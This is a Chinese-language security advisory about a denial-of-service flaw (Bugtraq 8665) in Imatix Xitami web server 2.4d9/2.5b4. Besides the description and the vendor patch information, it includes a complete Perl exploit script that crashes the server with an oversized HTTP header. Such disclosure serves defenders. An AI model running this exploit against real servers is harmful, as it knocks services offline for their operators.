Imatix Xitami超长头字段远程拒绝服务攻击漏洞
发布日期:2003-09-22
更新日期:2003-10-08
受影响系统:Imatix Xitami 2.5b4
Imatix Xitami 2.4d9
不受影响系统:Imatix Xitami 2.5b6
Imatix Xitami 2.4d10
描述:
BUGTRAQ ID:
8665
Xitami Webserver是一种小型WEB服务程序,可使用在Windows操作系统上。
Xitami在处理.shtm文件请求时对HTTP头字段缺少充分检查,远程攻击者可以利用这个漏洞对WEB服务进行拒绝服务攻击。
当服务器接收到.shtm文件请求,如果包含的HTTP头字段超出5154字节,并追加":"符号,就会导致发生程序异常而退出,精心构建提交数据可能以WEB权限执行任意指令。
<*来源:Oliver Karow (
Oliver.karow@gmx.de)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106424194200320&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Oliver Karow (
Oliver.karow@gmx.de)提供了如下测试方法:
#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT
#
# Sending a GET request for a *.shtm file with a header field of >= 5154 bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de
use IO::Socket;
$ip="127.0.0.1";
$port=80;
$var="A" x 5157;
$mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip,
PeerPort=>$port, Timeout=>5);
$mySocket->autoflush(1);
print $mySocket "GET /test.shtm HTTP/1.0\r\n".
$var.": */*\r\n\r\n";
@answer=<$mySocket>;
$length=@answer;
if ($length==0){die "\nService killed!\n";}
print @answer;
建议:
厂商补丁:
Imatix
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载新的Xitami (2.4d10 and 2.5b6)版本:
http://www.xitami.com浏览次数:2966
严重程度:0(网友投票)